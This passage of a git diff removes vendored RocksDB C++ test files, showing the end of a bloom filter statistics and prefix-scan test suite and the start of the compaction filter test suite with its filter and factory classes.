-  ASSERT_OK(Put("zzzzz_AAAC", "val3"));
-  ASSERT_OK(Put("zzzzz_AAAD", "val4"));
-
-  ASSERT_OK(Flush());
-
-  std::vector<std::string> iter_res;
-  auto iter = db_->NewIterator(ReadOptions());
-  // Seek to a key that was not in Domain
-  for (iter->Seek("zzzzz_AAAA"); iter->Valid(); iter->Next()) {
-    iter_res.emplace_back(iter->value().ToString());
-  }
-
-  std::vector<std::string> expected_res = {"val1", "val2", "val3", "val4"};
-  ASSERT_EQ(iter_res, expected_res);
-  delete iter;
-}
-
-#ifndef ROCKSDB_LITE
-class BloomStatsTestWithParam
-    : public DBBloomFilterTest,
-      public testing::WithParamInterface<std::tuple<bool, bool, bool>> {
- public:
-  BloomStatsTestWithParam() {
-    use_block_table_ = std::get<0>(GetParam());
-    use_block_based_builder_ = std::get<1>(GetParam());
-    partition_filters_ = std::get<2>(GetParam());
-
-    options_.create_if_missing = true;
-    options_.prefix_extractor.reset(rocksdb::NewFixedPrefixTransform(4));
-    options_.memtable_prefix_bloom_size_ratio =
-        8.0 * 1024.0 / static_cast<double>(options_.write_buffer_size);
-    if (use_block_table_) {
-      BlockBasedTableOptions table_options;
-      table_options.hash_index_allow_collision = false;
-      if (partition_filters_) {
-        assert(!use_block_based_builder_);
-        table_options.partition_filters = partition_filters_;
-        table_options.index_type =
-            BlockBasedTableOptions::IndexType::kTwoLevelIndexSearch;
-      }
-      table_options.filter_policy.reset(
-          NewBloomFilterPolicy(10, use_block_based_builder_));
-      options_.table_factory.reset(NewBlockBasedTableFactory(table_options));
-    } else {
-      assert(!partition_filters_);  // not supported in plain table
-      PlainTableOptions table_options;
-      options_.table_factory.reset(NewPlainTableFactory(table_options));
-    }
-    options_.env = env_;
-
-    get_perf_context()->Reset();
-    DestroyAndReopen(options_);
-  }
-
-  ~BloomStatsTestWithParam() {
-    get_perf_context()->Reset();
-    Destroy(options_);
-  }
-
-  // Required if inheriting from testing::WithParamInterface<>
-  static void SetUpTestCase() {}
-  static void TearDownTestCase() {}
-
-  bool use_block_table_;
-  bool use_block_based_builder_;
-  bool partition_filters_;
-  Options options_;
-};
-
-// 1 Insert 2 K-V pairs into DB
-// 2 Call Get() for both keys - expext memtable bloom hit stat to be 2
-// 3 Call Get() for nonexisting key - expect memtable bloom miss stat to be 1
-// 4 Call Flush() to create SST
-// 5 Call Get() for both keys - expext SST bloom hit stat to be 2
-// 6 Call Get() for nonexisting key - expect SST bloom miss stat to be 1
-// Test both: block and plain SST
-TEST_P(BloomStatsTestWithParam, BloomStatsTest) {
-  std::string key1("AAAA");
-  std::string key2("RXDB");  // not in DB
-  std::string key3("ZBRA");
-  std::string value1("Value1");
-  std::string value3("Value3");
-
-  ASSERT_OK(Put(key1, value1, WriteOptions()));
-  ASSERT_OK(Put(key3, value3, WriteOptions()));
-
-  // check memtable bloom stats
-  ASSERT_EQ(value1, Get(key1));
-  ASSERT_EQ(1, get_perf_context()->bloom_memtable_hit_count);
-  ASSERT_EQ(value3, Get(key3));
-  ASSERT_EQ(2, get_perf_context()->bloom_memtable_hit_count);
-  ASSERT_EQ(0, get_perf_context()->bloom_memtable_miss_count);
-
-  ASSERT_EQ("NOT_FOUND", Get(key2));
-  ASSERT_EQ(1, get_perf_context()->bloom_memtable_miss_count);
-  ASSERT_EQ(2, get_perf_context()->bloom_memtable_hit_count);
-
-  // sanity checks
-  ASSERT_EQ(0, get_perf_context()->bloom_sst_hit_count);
-  ASSERT_EQ(0, get_perf_context()->bloom_sst_miss_count);
-
-  Flush();
-
-  // sanity checks
-  ASSERT_EQ(0, get_perf_context()->bloom_sst_hit_count);
-  ASSERT_EQ(0, get_perf_context()->bloom_sst_miss_count);
-
-  // check SST bloom stats
-  ASSERT_EQ(value1, Get(key1));
-  ASSERT_EQ(1, get_perf_context()->bloom_sst_hit_count);
-  ASSERT_EQ(value3, Get(key3));
-  ASSERT_EQ(2, get_perf_context()->bloom_sst_hit_count);
-
-  ASSERT_EQ("NOT_FOUND", Get(key2));
-  ASSERT_EQ(1, get_perf_context()->bloom_sst_miss_count);
-}
-
-// Same scenario as in BloomStatsTest but using an iterator
-TEST_P(BloomStatsTestWithParam, BloomStatsTestWithIter) {
-  std::string key1("AAAA");
-  std::string key2("RXDB");  // not in DB
-  std::string key3("ZBRA");
-  std::string value1("Value1");
-  std::string value3("Value3");
-
-  ASSERT_OK(Put(key1, value1, WriteOptions()));
-  ASSERT_OK(Put(key3, value3, WriteOptions()));
-
-  unique_ptr<Iterator> iter(dbfull()->NewIterator(ReadOptions()));
-
-  // check memtable bloom stats
-  iter->Seek(key1);
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(value1, iter->value().ToString());
-  ASSERT_EQ(1, get_perf_context()->bloom_memtable_hit_count);
-  ASSERT_EQ(0, get_perf_context()->bloom_memtable_miss_count);
-
-  iter->Seek(key3);
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(value3, iter->value().ToString());
-  ASSERT_EQ(2, get_perf_context()->bloom_memtable_hit_count);
-  ASSERT_EQ(0, get_perf_context()->bloom_memtable_miss_count);
-
-  iter->Seek(key2);
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(!iter->Valid());
-  ASSERT_EQ(1, get_perf_context()->bloom_memtable_miss_count);
-  ASSERT_EQ(2, get_perf_context()->bloom_memtable_hit_count);
-
-  Flush();
-
-  iter.reset(dbfull()->NewIterator(ReadOptions()));
-
-  // Check SST bloom stats
-  iter->Seek(key1);
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(value1, iter->value().ToString());
-  ASSERT_EQ(1, get_perf_context()->bloom_sst_hit_count);
-
-  iter->Seek(key3);
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(value3, iter->value().ToString());
-  ASSERT_EQ(2, get_perf_context()->bloom_sst_hit_count);
-
-  iter->Seek(key2);
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(!iter->Valid());
-  ASSERT_EQ(1, get_perf_context()->bloom_sst_miss_count);
-  ASSERT_EQ(2, get_perf_context()->bloom_sst_hit_count);
-}
-
-INSTANTIATE_TEST_CASE_P(BloomStatsTestWithParam, BloomStatsTestWithParam,
-                        ::testing::Values(std::make_tuple(true, true, false),
-                                          std::make_tuple(true, false, false),
-                                          std::make_tuple(true, false, true),
-                                          std::make_tuple(false, false,
-                                                          false)));
-
-namespace {
-void PrefixScanInit(DBBloomFilterTest* dbtest) {
-  char buf[100];
-  std::string keystr;
-  const int small_range_sstfiles = 5;
-  const int big_range_sstfiles = 5;
-
-  // Generate 11 sst files with the following prefix ranges.
-  // GROUP 0: [0,10]                              (level 1)
-  // GROUP 1: [1,2], [2,3], [3,4], [4,5], [5, 6]  (level 0)
-  // GROUP 2: [0,6], [0,7], [0,8], [0,9], [0,10]  (level 0)
-  //
-  // A seek with the previous API would do 11 random I/Os (to all the
-  // files).  With the new API and a prefix filter enabled, we should
-  // only do 2 random I/O, to the 2 files containing the key.
-
-  // GROUP 0
-  snprintf(buf, sizeof(buf), "%02d______:start", 0);
-  keystr = std::string(buf);
-  ASSERT_OK(dbtest->Put(keystr, keystr));
-  snprintf(buf, sizeof(buf), "%02d______:end", 10);
-  keystr = std::string(buf);
-  ASSERT_OK(dbtest->Put(keystr, keystr));
-  dbtest->Flush();
-  dbtest->dbfull()->CompactRange(CompactRangeOptions(), nullptr,
-                                 nullptr);  // move to level 1
-
-  // GROUP 1
-  for (int i = 1; i <= small_range_sstfiles; i++) {
-    snprintf(buf, sizeof(buf), "%02d______:start", i);
-    keystr = std::string(buf);
-    ASSERT_OK(dbtest->Put(keystr, keystr));
-    snprintf(buf, sizeof(buf), "%02d______:end", i + 1);
-    keystr = std::string(buf);
-    ASSERT_OK(dbtest->Put(keystr, keystr));
-    dbtest->Flush();
-  }
-
-  // GROUP 2
-  for (int i = 1; i <= big_range_sstfiles; i++) {
-    snprintf(buf, sizeof(buf), "%02d______:start", 0);
-    keystr = std::string(buf);
-    ASSERT_OK(dbtest->Put(keystr, keystr));
-    snprintf(buf, sizeof(buf), "%02d______:end", small_range_sstfiles + i + 1);
-    keystr = std::string(buf);
-    ASSERT_OK(dbtest->Put(keystr, keystr));
-    dbtest->Flush();
-  }
-}
-}  // namespace
-
-TEST_F(DBBloomFilterTest, PrefixScan) {
-  while (ChangeFilterOptions()) {
-    int count;
-    Slice prefix;
-    Slice key;
-    char buf[100];
-    Iterator* iter;
-    snprintf(buf, sizeof(buf), "03______:");
-    prefix = Slice(buf, 8);
-    key = Slice(buf, 9);
-    ASSERT_EQ(key.difference_offset(prefix), 8);
-    ASSERT_EQ(prefix.difference_offset(key), 8);
-    // db configs
-    env_->count_random_reads_ = true;
-    Options options = CurrentOptions();
-    options.env = env_;
-    options.prefix_extractor.reset(NewFixedPrefixTransform(8));
-    options.disable_auto_compactions = true;
-    options.max_background_compactions = 2;
-    options.create_if_missing = true;
-    options.memtable_factory.reset(NewHashSkipListRepFactory(16));
-    options.allow_concurrent_memtable_write = false;
-
-    BlockBasedTableOptions table_options;
-    table_options.no_block_cache = true;
-    table_options.filter_policy.reset(NewBloomFilterPolicy(10));
-    table_options.whole_key_filtering = false;
-    options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-    // 11 RAND I/Os
-    DestroyAndReopen(options);
-    PrefixScanInit(this);
-    count = 0;
-    env_->random_read_counter_.Reset();
-    iter = db_->NewIterator(ReadOptions());
-    for (iter->Seek(prefix); iter->Valid(); iter->Next()) {
-      if (!iter->key().starts_with(prefix)) {
-        break;
-      }
-      count++;
-    }
-    ASSERT_OK(iter->status());
-    delete iter;
-    ASSERT_EQ(count, 2);
-    ASSERT_EQ(env_->random_read_counter_.Read(), 2);
-    Close();
-  }  // end of while
-}
-
-TEST_F(DBBloomFilterTest, OptimizeFiltersForHits) {
-  Options options = CurrentOptions();
-  options.write_buffer_size = 64 * 1024;
-  options.arena_block_size = 4 * 1024;
-  options.target_file_size_base = 64 * 1024;
-  options.level0_file_num_compaction_trigger = 2;
-  options.level0_slowdown_writes_trigger = 2;
-  options.level0_stop_writes_trigger = 4;
-  options.max_bytes_for_level_base = 256 * 1024;
-  options.max_write_buffer_number = 2;
-  options.max_background_compactions = 8;
-  options.max_background_flushes = 8;
-  options.compression = kNoCompression;
-  options.compaction_style = kCompactionStyleLevel;
-  options.level_compaction_dynamic_level_bytes = true;
-  BlockBasedTableOptions bbto;
-  bbto.cache_index_and_filter_blocks = true;
-  bbto.filter_policy.reset(NewBloomFilterPolicy(10, true));
-  bbto.whole_key_filtering = true;
-  options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-  options.optimize_filters_for_hits = true;
-  options.statistics = rocksdb::CreateDBStatistics();
-  CreateAndReopenWithCF({"mypikachu"}, options);
-
-  int numkeys = 200000;
-
-  // Generate randomly shuffled keys, so the updates are almost
-  // random.
-  std::vector<int> keys;
-  keys.reserve(numkeys);
-  for (int i = 0; i < numkeys; i += 2) {
-    keys.push_back(i);
-  }
-  std::random_shuffle(std::begin(keys), std::end(keys));
-
-  int num_inserted = 0;
-  for (int key : keys) {
-    ASSERT_OK(Put(1, Key(key), "val"));
-    if (++num_inserted % 1000 == 0) {
-      dbfull()->TEST_WaitForFlushMemTable();
-      dbfull()->TEST_WaitForCompact();
-    }
-  }
-  ASSERT_OK(Put(1, Key(0), "val"));
-  ASSERT_OK(Put(1, Key(numkeys), "val"));
-  ASSERT_OK(Flush(1));
-  dbfull()->TEST_WaitForCompact();
-
-  if (NumTableFilesAtLevel(0, 1) == 0) {
-    // No Level 0 file. Create one.
-    ASSERT_OK(Put(1, Key(0), "val"));
-    ASSERT_OK(Put(1, Key(numkeys), "val"));
-    ASSERT_OK(Flush(1));
-    dbfull()->TEST_WaitForCompact();
-  }
-
-  for (int i = 1; i < numkeys; i += 2) {
-    ASSERT_EQ(Get(1, Key(i)), "NOT_FOUND");
-  }
-
-  ASSERT_EQ(0, TestGetTickerCount(options, GET_HIT_L0));
-  ASSERT_EQ(0, TestGetTickerCount(options, GET_HIT_L1));
-  ASSERT_EQ(0, TestGetTickerCount(options, GET_HIT_L2_AND_UP));
-
-  // Now we have three sorted run, L0, L5 and L6 with most files in L6 have
-  // no bloom filter. Most keys be checked bloom filters twice.
-  ASSERT_GT(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 65000 * 2);
-  ASSERT_LT(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 120000 * 2);
-
-  for (int i = 0; i < numkeys; i += 2) {
-    ASSERT_EQ(Get(1, Key(i)), "val");
-  }
-
-  // Part 2 (read path): rewrite last level with blooms, then verify they get
-  // cached only if !optimize_filters_for_hits
-  options.disable_auto_compactions = true;
-  options.num_levels = 9;
-  options.optimize_filters_for_hits = false;
-  options.statistics = CreateDBStatistics();
-  bbto.block_cache.reset();
-  options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-
-  ReopenWithColumnFamilies({"default", "mypikachu"}, options);
-  MoveFilesToLevel(7 /* level */, 1 /* column family index */);
-
-  std::string value = Get(1, Key(0));
-  uint64_t prev_cache_filter_hits =
-      TestGetTickerCount(options, BLOCK_CACHE_FILTER_HIT);
-  value = Get(1, Key(0));
-  ASSERT_EQ(prev_cache_filter_hits + 1,
-            TestGetTickerCount(options, BLOCK_CACHE_FILTER_HIT));
-
-  // Now that we know the filter blocks exist in the last level files, see if
-  // filter caching is skipped for this optimization
-  options.optimize_filters_for_hits = true;
-  options.statistics = CreateDBStatistics();
-  bbto.block_cache.reset();
-  options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-
-  ReopenWithColumnFamilies({"default", "mypikachu"}, options);
-
-  value = Get(1, Key(0));
-  ASSERT_EQ(0, TestGetTickerCount(options, BLOCK_CACHE_FILTER_MISS));
-  ASSERT_EQ(0, TestGetTickerCount(options, BLOCK_CACHE_FILTER_HIT));
-  ASSERT_EQ(2 /* index and data block */,
-            TestGetTickerCount(options, BLOCK_CACHE_ADD));
-
-  // Check filter block ignored for files preloaded during DB::Open()
-  options.max_open_files = -1;
-  options.statistics = CreateDBStatistics();
-  bbto.block_cache.reset();
-  options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-
-  ReopenWithColumnFamilies({"default", "mypikachu"}, options);
-
-  uint64_t prev_cache_filter_misses =
-      TestGetTickerCount(options, BLOCK_CACHE_FILTER_MISS);
-  prev_cache_filter_hits = TestGetTickerCount(options, BLOCK_CACHE_FILTER_HIT);
-  Get(1, Key(0));
-  ASSERT_EQ(prev_cache_filter_misses,
-            TestGetTickerCount(options, BLOCK_CACHE_FILTER_MISS));
-  ASSERT_EQ(prev_cache_filter_hits,
-            TestGetTickerCount(options, BLOCK_CACHE_FILTER_HIT));
-
-  // Check filter block ignored for file trivially-moved to bottom level
-  bbto.block_cache.reset();
-  options.max_open_files = 100;  // setting > -1 makes it not preload all files
-  options.statistics = CreateDBStatistics();
-  options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-
-  ReopenWithColumnFamilies({"default", "mypikachu"}, options);
-
-  ASSERT_OK(Put(1, Key(numkeys + 1), "val"));
-  ASSERT_OK(Flush(1));
-
-  int32_t trivial_move = 0;
-  int32_t non_trivial_move = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:TrivialMove",
-      [&](void* arg) { trivial_move++; });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial",
-      [&](void* arg) { non_trivial_move++; });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  CompactRangeOptions compact_options;
-  compact_options.bottommost_level_compaction =
-      BottommostLevelCompaction::kSkip;
-  compact_options.change_level = true;
-  compact_options.target_level = 7;
-  db_->CompactRange(compact_options, handles_[1], nullptr, nullptr);
-
-  ASSERT_EQ(trivial_move, 1);
-  ASSERT_EQ(non_trivial_move, 0);
-
-  prev_cache_filter_hits = TestGetTickerCount(options, BLOCK_CACHE_FILTER_HIT);
-  prev_cache_filter_misses =
-      TestGetTickerCount(options, BLOCK_CACHE_FILTER_MISS);
-  value = Get(1, Key(numkeys + 1));
-  ASSERT_EQ(prev_cache_filter_hits,
-            TestGetTickerCount(options, BLOCK_CACHE_FILTER_HIT));
-  ASSERT_EQ(prev_cache_filter_misses,
-            TestGetTickerCount(options, BLOCK_CACHE_FILTER_MISS));
-
-  // Check filter block not cached for iterator
-  bbto.block_cache.reset();
-  options.statistics = CreateDBStatistics();
-  options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-
-  ReopenWithColumnFamilies({"default", "mypikachu"}, options);
-
-  std::unique_ptr<Iterator> iter(db_->NewIterator(ReadOptions(), handles_[1]));
-  iter->SeekToFirst();
-  ASSERT_EQ(0, TestGetTickerCount(options, BLOCK_CACHE_FILTER_MISS));
-  ASSERT_EQ(0, TestGetTickerCount(options, BLOCK_CACHE_FILTER_HIT));
-  ASSERT_EQ(2 /* index and data block */,
-            TestGetTickerCount(options, BLOCK_CACHE_ADD));
-}
-
-#endif  // ROCKSDB_LITE
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/db_compaction_filter_test.cc b/thirdparty/rocksdb/db/db_compaction_filter_test.cc
deleted file mode 100644
index 9f751f0..0000000
--- a/thirdparty/rocksdb/db/db_compaction_filter_test.cc
+++ /dev/null
@@ -1,845 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/db_test_util.h"
-#include "port/stack_trace.h"
-
-namespace rocksdb {
-
-static int cfilter_count = 0;
-static int cfilter_skips = 0;
-
-// This is a static filter used for filtering
-// kvs during the compaction process.
-static std::string NEW_VALUE = "NewValue";
-
-class DBTestCompactionFilter : public DBTestBase {
- public:
-  DBTestCompactionFilter() : DBTestBase("/db_compaction_filter_test") {}
-};
-
-class KeepFilter : public CompactionFilter {
- public:
-  virtual bool Filter(int level, const Slice& key, const Slice& value,
-                      std::string* new_value, bool* value_changed) const
-      override {
-    cfilter_count++;
-    return false;
-  }
-
-  virtual const char* Name() const override { return "KeepFilter"; }
-};
-
-class DeleteFilter : public CompactionFilter {
- public:
-  virtual bool Filter(int level, const Slice& key, const Slice& value,
-                      std::string* new_value, bool* value_changed) const
-      override {
-    cfilter_count++;
-    return true;
-  }
-
-  virtual const char* Name() const override { return "DeleteFilter"; }
-};
-
-class DeleteISFilter : public CompactionFilter {
- public:
-  virtual bool Filter(int level, const Slice& key, const Slice& value,
-                      std::string* new_value,
-                      bool* value_changed) const override {
-    cfilter_count++;
-    int i = std::stoi(key.ToString());
-    if (i > 5 && i <= 105) {
-      return true;
-    }
-    return false;
-  }
-
-  virtual bool IgnoreSnapshots() const override { return true; }
-
-  virtual const char* Name() const override { return "DeleteFilter"; }
-};
-
-// Skip x if floor(x/10) is even, use range skips. Requires that keys are
-// zero-padded to length 10.
-class SkipEvenFilter : public CompactionFilter {
- public:
-  virtual Decision FilterV2(int level, const Slice& key, ValueType value_type,
-                            const Slice& existing_value, std::string* new_value,
-                            std::string* skip_until) const override {
-    cfilter_count++;
-    int i = std::stoi(key.ToString());
-    if (i / 10 % 2 == 0) {
-      char key_str[100];
-      snprintf(key_str, sizeof(key), "%010d", i / 10 * 10 + 10);
-      *skip_until = key_str;
-      ++cfilter_skips;
-      return Decision::kRemoveAndSkipUntil;
-    }
-    return Decision::kKeep;
-  }
-
-  virtual bool IgnoreSnapshots() const override { return true; }
-
-  virtual const char* Name() const override { return "DeleteFilter"; }
-};
-
-class DelayFilter : public CompactionFilter {
- public:
-  explicit DelayFilter(DBTestBase* d) : db_test(d) {}
-  virtual bool Filter(int level, const Slice& key, const Slice& value,
-                      std::string* new_value,
-                      bool* value_changed) const override {
-    db_test->env_->addon_time_.fetch_add(1000);
-    return true;
-  }
-
-  virtual const char* Name() const override { return "DelayFilter"; }
-
- private:
-  DBTestBase* db_test;
-};
-
-class ConditionalFilter : public CompactionFilter {
- public:
-  explicit ConditionalFilter(const std::string* filtered_value)
-      : filtered_value_(filtered_value) {}
-  virtual bool Filter(int level, const Slice& key, const Slice& value,
-                      std::string* new_value,
-                      bool* value_changed) const override {
-    return value.ToString() == *filtered_value_;
-  }
-
-  virtual const char* Name() const override { return "ConditionalFilter"; }
-
- private:
-  const std::string* filtered_value_;
-};
-
-class ChangeFilter : public CompactionFilter {
- public:
-  explicit ChangeFilter() {}
-
-  virtual bool Filter(int level, const Slice& key, const Slice& value,
-                      std::string* new_value, bool* value_changed) const
-      override {
-    assert(new_value != nullptr);
-    *new_value = NEW_VALUE;
-    *value_changed = true;
-    return false;
-  }
-
-  virtual const char* Name() const override { return "ChangeFilter"; }
-};
-
-class KeepFilterFactory : public CompactionFilterFactory {
- public:
-  explicit KeepFilterFactory(bool check_context = false,
-                             bool check_context_cf_id = false)
-      : check_context_(check_context),
-        check_context_cf_id_(check_context_cf_id),
-        compaction_filter_created_(false) {}
-
-  virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-      const CompactionFilter::Context& context) override {
-    if (check_context_) {
-      EXPECT_EQ(expect_full_compaction_.load(), context.is_full_compaction);
-      EXPECT_EQ(expect_manual_compaction_.load(), context.is_manual_compaction);
-    }
-    if (check_context_cf_id_) {
-      EXPECT_EQ(expect_cf_id_.load(), context.column_family_id);
-    }
-    compaction_filter_created_ = true;
-    return std::unique_ptr<CompactionFilter>(new KeepFilter());
-  }
-
-  bool compaction_filter_created() const { return compaction_filter_created_; }
-
-  virtual const char* Name() const override { return "KeepFilterFactory"; }
-  bool check_context_;
-  bool check_context_cf_id_;
-  std::atomic_bool expect_full_compaction_;
-  std::atomic_bool expect_manual_compaction_;
-  std::atomic<uint32_t> expect_cf_id_;
-  bool compaction_filter_created_;
-};
-
-class DeleteFilterFactory : public CompactionFilterFactory {
- public:
-  virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-      const CompactionFilter::Context& context) override {
-    if (context.is_manual_compaction) {
-      return std::unique_ptr<CompactionFilter>(new DeleteFilter());
-    } else {
-      return std::unique_ptr<CompactionFilter>(nullptr);
-    }
-  }
-
-  virtual const char* Name() const override { return "DeleteFilterFactory"; }
-};
-
-// Delete Filter Factory which ignores snapshots
-class DeleteISFilterFactory : public CompactionFilterFactory {
- public:
-  virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-      const CompactionFilter::Context& context) override {
-    if (context.is_manual_compaction) {
-      return std::unique_ptr<CompactionFilter>(new DeleteISFilter());
-    } else {
-      return std::unique_ptr<CompactionFilter>(nullptr);
-    }
-  }
-
-  virtual const char* Name() const override { return "DeleteFilterFactory"; }
-};
-
-class SkipEvenFilterFactory : public CompactionFilterFactory {
- public:
-  virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-      const CompactionFilter::Context& context) override {
-    if (context.is_manual_compaction) {
-      return std::unique_ptr<CompactionFilter>(new SkipEvenFilter());
-    } else {
-      return std::unique_ptr<CompactionFilter>(nullptr);
-    }
-  }
-
-  virtual const char* Name() const override { return "SkipEvenFilterFactory"; }
-};
-
-class DelayFilterFactory : public CompactionFilterFactory {
- public:
-  explicit DelayFilterFactory(DBTestBase* d) : db_test(d) {}
-  virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-      const CompactionFilter::Context& context) override {
-    return std::unique_ptr<CompactionFilter>(new DelayFilter(db_test));
-  }
-
-  virtual const char* Name() const override { return "DelayFilterFactory"; }
-
- private:
-  DBTestBase* db_test;
-};
-
-class ConditionalFilterFactory : public CompactionFilterFactory {
- public:
-  explicit ConditionalFilterFactory(const Slice& filtered_value)
-      : filtered_value_(filtered_value.ToString()) {}
-
-  virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-      const CompactionFilter::Context& context) override {
-    return std::unique_ptr<CompactionFilter>(
-        new ConditionalFilter(&filtered_value_));
-  }
-
-  virtual const char* Name() const override {
-    return "ConditionalFilterFactory";
-  }
-
- private:
-  std::string filtered_value_;
-};
-
-class ChangeFilterFactory : public CompactionFilterFactory {
- public:
-  explicit ChangeFilterFactory() {}
-
-  virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-      const CompactionFilter::Context& context) override {
-    return std::unique_ptr<CompactionFilter>(new ChangeFilter());
-  }
-
-  virtual const char* Name() const override { return "ChangeFilterFactory"; }
-};
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBTestCompactionFilter, CompactionFilter) {
-  Options options = CurrentOptions();
-  options.max_open_files = -1;
-  options.num_levels = 3;
-  options.compaction_filter_factory = std::make_shared<KeepFilterFactory>();
-  options = CurrentOptions(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  // Write 100K keys, these are written to a few files in L0.
-  const std::string value(10, 'x');
-  for (int i = 0; i < 100000; i++) {
-    char key[100];
-    snprintf(key, sizeof(key), "B%010d", i);
-    Put(1, key, value);
-  }
-  ASSERT_OK(Flush(1));
-
-  // Push all files to the highest level L2. Verify that
-  // the compaction is each level invokes the filter for
-  // all the keys in that level.
-  cfilter_count = 0;
-  dbfull()->TEST_CompactRange(0, nullptr, nullptr, handles_[1]);
-  ASSERT_EQ(cfilter_count, 100000);
-  cfilter_count = 0;
-  dbfull()->TEST_CompactRange(1, nullptr, nullptr, handles_[1]);
-  ASSERT_EQ(cfilter_count, 100000);
-
-  ASSERT_EQ(NumTableFilesAtLevel(0, 1), 0);
-  ASSERT_EQ(NumTableFilesAtLevel(1, 1), 0);
-  ASSERT_NE(NumTableFilesAtLevel(2, 1), 0);
-  cfilter_count = 0;
-
-  // All the files are in the lowest level.
-  // Verify that all but the 100001st record
-  // has sequence number zero. The 100001st record
-  // is at the tip of this snapshot and cannot
-  // be zeroed out.
-  int count = 0;
-  int total = 0;
-  Arena arena;
-  {
-    InternalKeyComparator icmp(options.comparator);
-    RangeDelAggregator range_del_agg(icmp, {} /* snapshots */);
-    ScopedArenaIterator iter(
-        dbfull()->NewInternalIterator(&arena, &range_del_agg, handles_[1]));
-    iter->SeekToFirst();
-    ASSERT_OK(iter->status());
-    while (iter->Valid()) {
-      ParsedInternalKey ikey(Slice(), 0, kTypeValue);
-      ikey.sequence = -1;
-      ASSERT_EQ(ParseInternalKey(iter->key(), &ikey), true);
-      total++;
-      if (ikey.sequence != 0) {
-        count++;
-      }
-      iter->Next();
-    }
-  }
-  ASSERT_EQ(total, 100000);
-  ASSERT_EQ(count, 1);
-
-  // overwrite all the 100K keys once again.
-  for (int i = 0; i < 100000; i++) {
-    char key[100];
-    snprintf(key, sizeof(key), "B%010d", i);
-    ASSERT_OK(Put(1, key, value));
-  }
-  ASSERT_OK(Flush(1));
-
-  // push all files to the highest level L2. This
-  // means that all keys should pass at least once
-  // via the compaction filter
-  cfilter_count = 0;
-  dbfull()->TEST_CompactRange(0, nullptr, nullptr, handles_[1]);
-  ASSERT_EQ(cfilter_count, 100000);
-  cfilter_count = 0;
-  dbfull()->TEST_CompactRange(1, nullptr, nullptr, handles_[1]);
-  ASSERT_EQ(cfilter_count, 100000);
-  ASSERT_EQ(NumTableFilesAtLevel(0, 1), 0);
-  ASSERT_EQ(NumTableFilesAtLevel(1, 1), 0);
-  ASSERT_NE(NumTableFilesAtLevel(2, 1), 0);
-
-  // create a new database with the compaction
-  // filter in such a way that it deletes all keys
-  options.compaction_filter_factory = std::make_shared<DeleteFilterFactory>();
-  options.create_if_missing = true;
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  // write all the keys once again.
-  for (int i = 0; i < 100000; i++) {
-    char key[100];
-    snprintf(key, sizeof(key), "B%010d", i);
-    ASSERT_OK(Put(1, key, value));
-  }
-  ASSERT_OK(Flush(1));
-  ASSERT_NE(NumTableFilesAtLevel(0, 1), 0);
-  ASSERT_EQ(NumTableFilesAtLevel(1, 1), 0);
-  ASSERT_EQ(NumTableFilesAtLevel(2, 1), 0);
-
-  // Push all files to the highest level L2. This
-  // triggers the compaction filter to delete all keys,
-  // verify that at the end of the compaction process,
-  // nothing is left.
-  cfilter_count = 0;
-  dbfull()->TEST_CompactRange(0, nullptr, nullptr, handles_[1]);
-  ASSERT_EQ(cfilter_count, 100000);
-  cfilter_count = 0;
-  dbfull()->TEST_CompactRange(1, nullptr, nullptr, handles_[1]);
-  ASSERT_EQ(cfilter_count, 0);
-  ASSERT_EQ(NumTableFilesAtLevel(0, 1), 0);
-  ASSERT_EQ(NumTableFilesAtLevel(1, 1), 0);
-
-  {
-    // Scan the entire database to ensure that nothing is left
-    std::unique_ptr<Iterator> iter(
-        db_->NewIterator(ReadOptions(), handles_[1]));
-    iter->SeekToFirst();
-    count = 0;
-    while (iter->Valid()) {
-      count++;
-      iter->Next();
-    }
-    ASSERT_EQ(count, 0);
-  }
-
-  // The sequence number of the remaining record
-  // is not zeroed out even though it is at the
-  // level Lmax because this record is at the tip
-  count = 0;
-  {
-    InternalKeyComparator icmp(options.comparator);
-    RangeDelAggregator range_del_agg(icmp, {} /* snapshots */);
-    ScopedArenaIterator iter(
-        dbfull()->NewInternalIterator(&arena, &range_del_agg, handles_[1]));
-    iter->SeekToFirst();
-    ASSERT_OK(iter->status());
